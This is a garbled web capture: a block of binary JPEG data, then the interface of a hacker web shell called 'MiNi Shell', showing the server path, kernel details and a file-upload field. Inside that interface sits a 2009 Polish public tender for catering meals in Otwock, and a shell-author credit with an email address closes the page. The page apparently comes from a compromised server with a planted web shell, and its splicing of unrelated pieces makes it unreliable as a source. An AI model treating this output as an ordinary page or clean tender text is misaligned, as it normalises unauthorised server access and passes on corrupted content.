JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090730/123347-N-2009.html

<p class="kh_header"><b>Otwock: przygotowanie i dostarczenie dla 90 osób  uczestników szkolenia  językowego,  tj. 4446 zestawów posiłków,   w ramach projektu Przez angielski do wyższych kwalifikacj współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. 1 posiłek składa się z kanapki i  napoju i deseru.</b><br>
<b>Numer ogłoszenia: 123347 - 2009; data zamieszczenia: 30.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Oświata Powiatowa w Otwocku , ul. Poniatowskiego 10, 05-400 Otwock, woj. mazowieckie, tel. 0-22 719 48 27, faks 0-22 779 40 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opotwock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Edukacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowanie i dostarczenie dla 90 osób  uczestników szkolenia  językowego,  tj. 4446 zestawów posiłków,   w ramach projektu Przez angielski do wyższych kwalifikacj współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. 1 posiłek składa się z kanapki i  napoju i deseru..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i dostarczenie dla 90 osób  uczestników szkolenia  językowego,  tj. 4446 zestawów posiłków,   w ramach projektu Przez angielski do wyższych kwalifikacji współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
Podanie dla każdej grupy liczącej 9 osób zestawu posiłkowego w miejscach szkolenia udostępnionych przez Zamawiającego tj. obiektach Zespołu Szkół Ogólnokształcących w Otwocku ul. Filipowicza 9 oraz Zespołu Szkół Nr 1 w Otwocku ul. Słowackiego 4/10, jak również uprzątnięcia stołu po każdych zajęciach. 
Zamawiający zapewnia miejsce do podania posiłku w sali szkoleniowej  wraz z wyposażeniem obejmującym nienakryty stół, natomiast Wykonawca ma obowiązek nakrycia stołu i umiejscowienia na nim zestawu posiłkowego w czasie 5 minut przed rozpoczęciem zajęć oraz sprzątnięcia stołu i usunięcia resztek po zestawach posiłkowych w czasie 5 minut po zakończeniu zajęć.  
Planowany harmonogram zajęć: godziny popołudniowe, zajęcia odbywają się w godzinach 16.30-18.15 oraz zajęcia w godzinach 18.20 - 20.05. Jednego dnia mogą odbywać się szkolenia dla 4 lub 6 grup w ww placówkach w trzech różnych salach. W Zespole Szkół Ogólnokształcących w Otwocku ul. Filipowicza 9 planowane są zajęcia w poniedziałki, wtorki, środy i czwartki. Natomiast w Zespole Szkół Nr 1 w Otwocku planowane są zajęcia we wtorki i czwartki.  
Zamawiający dopuszcza inny rozkład dniowy i godzinowy zajęć, jednakże w tych dniach musi być zapewniony posiłek  dla uczestników szkolenia. 
W przypadku zmian harmonogramu szkolenia informacja o ilości posiłków będzie przekazywana pisemnie bądź telefonicznie  przez Zamawiającego Wykonawcy na co najmniej 3 dni przed szkoleniem. 
W skład zestawu posiłkowego ma wchodzić 9 jednakowych posiłków: 9 jednakowych kanapek, 9 jednakowych napojów i 9 jednakowych deserów.  
Zestawy mają być zróżnicowane, np. jednego dnia - kanapka, sok, jabłko, drugiego dnia  - kanapka, woda niegazowana, baton, itp.
Jeden zestaw posiłkowy musi składać się z:
kanapka, w skład której ma wchodzić = bułka kajzerka o wadze min. 50 g. z wypieku z dnia szkolenia, wędlina - szynka lub baleron o wadze min. 5 g, i sera żółtego o wadze min.5 g, i warzyw min. 4 rodzaje, spośród następujących rodzajów: sałata, ogórek świeży lub kiszony, rzodkiewka, koper, pietruszka. Wędlina i ser żółty muszą pokrywać całość bułki. Kanapka musi być zapakowana w folię spożywczą. 
napój , w skład którego ma wchodzić woda mineralna gazowana lub niegazowana o poj. min. 0,33 l podawana w opakowaniu plastikowym producenta, albo sok: pomarańczowy, wiśniowy, jabłkowy, porzeczkowy, multiwitamina o poj. min. 0,33 l podawany w opakowaniu szklanym producenta
deser, w skład którego ma wchodzić baton czekoladowy o wadze min. 50g podawany  w opakowaniu producenta
lub wypiek cukierniczy (np. pączek z nadzieniem o wadze min. 65 g albo drożdżówka z nadzieniem o wadze min. 90 g albo rogal z nadzieniem o wadze min. 65g), 
lub owoc (np. jabłko o wadze min. 150g albo gruszka o wadze min. 150g albo  banan o wadze min. 150g.)
Na Wykonawcy ciąży obowiązek dopilnowania potwierdzenia odbioru posiłku przez każdego uczestnika szkolenia w formie pisemnej. 
Wykonawca zobowiązany jest dostarczyć na własny koszt i ryzyko przedmiot usług cateringowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się WYKONAWCY, którzy:
spełniają warunki określone w art 22 ust 1 ustawy Prawo Zamówień Publicznych
1.2.  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tekst jednolity Dz. U. z  2007 r., Nr 223, poz.1655  ze zm.) 
Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
 Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych oświadczeniach  i dokumentach..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia  spełnienia  warunków udziału w postępowaniu  oferta musi  zawierać następujące  dokumenty i oświadczenia lub poświadczenie za zgodność z oryginałem ich odpisy lub kserokopie:

1.1  Oświadczenie, że Wykonawca  spełnienia warunki  udziału w postępowaniu, zgodnie 
       z art. 22 ust. 1 PZP oraz, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 PZP.  
       określone  w art. 22 ust1  ustawy Prawo zamówień publicznych, zgodne z wzorem stanowiącym Załącznik do niniejszej Dokumentacji.
1.2.  Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż 
       6 miesięcy przed upływem terminu składania ofert. 

2.   Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów wymienionych w pkt 1.2, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania  potwierdzające odpowiednio, że:
A)  nie otwarto jego likwidacji ani nie ogłoszono upadłości,
Dokumenty , o których mowa w pkt  A SIWZ  powinny być wystawione nie wcześniej niż 6 miesięcy  przed upływem składania ofert
Jeżeli  w kraju pochodzenia osoby  lub  w kraju, w którym  wykonawca  ma siedzibę lub miejsca zamieszkania,  nie wydaje się dokumentów, o których mowa  wyżej,  zastępuje  się je dokumentami  zawierającymi oświadczenie złożone  przed notariuszem, właściwym   organem sądowym, administracyjnym albo  organem samorządu zawodowego lub gospodarczego kraju, w którym  Wykonawca ma siedzibę  lub  miejsce zamieszkania.

Brak jakiegokolwiek z wyżej wymienionych dokumentów, złożenie dokumentu w niewłaściwej formie, nie uzupełnienie lub nie wyjaśnienie dokumentów potwierdzających spełnienie warunków art. 26 ust 3 Pzp w terminie wyznaczonym przez zamawiającego, spowoduje o wykluczenie Wykonawcy z postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.opotwock.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oświata Powiatowa ul. Poniatowskiego 10 w sekretariacie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2009 godzina 10:00, miejsce: Sekretariat  Oświata Powiatowa ul. Poniatowskiego 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com